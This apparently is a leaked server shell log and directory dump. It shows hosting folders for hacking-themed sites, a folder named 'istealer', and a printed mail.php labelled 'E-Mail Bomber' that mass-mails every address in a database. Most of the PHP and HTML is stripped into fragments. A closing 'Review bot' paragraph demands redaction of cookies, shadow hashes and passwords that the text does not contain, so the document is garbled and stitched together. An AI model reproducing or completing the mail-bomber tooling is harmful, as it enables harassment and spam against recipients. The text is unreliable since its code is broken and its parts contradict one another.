/etc/rc.local +cat /etc/rc.conf +cd /home/224422/ +ls -[la +ls -la +cd 224422.w2c.ru/ +ls -la +ls -la +cat index.php +cd inn +cd inc +ls -la +cd .. 
+ls -la +ls -la pwd +ls -la adm +date +ntpdate -v -b in.pool.ntp.org +ntpdate -v -b pool.ntp.org +date 0037 +date +date --help +date +mc +ps ax +/usr/local/etc/rc.d/apache22 start +ps ax +ps ax +ps ax +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +top +/usr/local/etc/rc.d/apache22 restart +top -S +netstat +top -S +tcpdump +exit +/usr/local/etc/rc.d/apache22 restart +exit +ps ax +exit +cat /usr/local/etc/apache22/vhosts/hackerzhub.conf +cat /usr/local/etc/apache22/vhosts/secunet.conf +history | grep php +ee /usr/local/etc/php.ini +tail -100 /var/log/httpd/httpd_access.log +grep hackbase.cc /usr/local/etc/apache22/vhosts/* +cd /home/webserver/hackbase.cc +ls -la +ee info.php +ee /usr/local/etc/php-apache.ini +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 restart +nslookup +nslookup +exit + +# cd /home + +# ls -la +total 36 +drwxr-x--x 9 root wheel 512 Oct 14 00:41 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 224422 +drwxr-x--- 5 4004 www 512 Oct 8 18:55 4004 +drwxr-x--- 10 hbstream www 512 Oct 9 19:37 hbstream +drwxr-x--- 5 secunet www 512 Jul 6 21:14 secunet +drwxr-x--- 3 testserver www 512 Sep 21 18:11 testserver +drwxr-x--- 3 testsite www 512 Sep 2 06:55 testsite +drwxr-xr-x 6 webserver www 512 Oct 14 00:37 webserver + +# cd 224422 + +# ls +224422.w2c.ru temp + +# ls -la +total 16 +drwxrwxr-x 4 224422 www 512 Sep 18 18:05 . +drwxr-x--x 9 root wheel 512 Sep 30 10:52 .. +drwxrwx--- 4 224422 www 512 Sep 20 18:24 224422.w2c.ru +drwxrwx--- 2 224422 www 2048 Sep 20 15:04 temp + +# cd 224422.w2c.ru + +# ls -la +total 36 +drwxrwx--- 6 224422 www 512 Oct 18 17:58 . +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 .. 
+drwxrwxrwx 3 224422 www 1024 Sep 18 17:26 Checker +-rw-r--r-- 1 224422 www 1034 Sep 20 18:24 index.html +drwxr-xr-x 11 224422 www 512 Sep 19 17:36 istealer +-rw-r--r-- 1 224422 www 2704 Oct 18 17:58 mail.php +drwxrwxrwx 2 224422 www 512 Oct 13 21:46 test +drwxrwxrwx 3 224422 www 512 Oct 13 21:41 test2 + +# cat mail.php + + + + + + + + + + +E-Mail Bomber + + +email, $bom, $anon, $von); + if($mail == TRUE){ + echo $row->email . " hat EMail erhalten."."
";} + else{ + echo $row->email . " hat keine Email erhalten."."
";} + } +} +?> +
######################################
+##########-DB-Mass-Mailer--###########
+#################-by-#################
+##############--bebop--###############
+######################################

+
+ + + + + + + +
Email-Liste:
Betreff:
+ +
von:
+ +
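Review bot: the added file commits usable secrets verbatim, and they should be redacted before this lands. The captured `GET /board/showthread.php` request keeps its full Cookie header, including the `bb_password` and `bb_sessionhash` values. The `cat /etc/shadow` and `cat /etc/master.passwd` listings keep the complete `$6$` and `$1$` hash strings for root and the user accounts. The block after `head -n75 includes/config.php` is a plain username:password list. If the text is being archived for reference, replace each of those values with a marked placeholder, keeping the account names and the hash-scheme prefix where the structure matters, and mask the source addresses in the `last` output as well. Third-party credentials and login origins would otherwise stay in the repository history permanently.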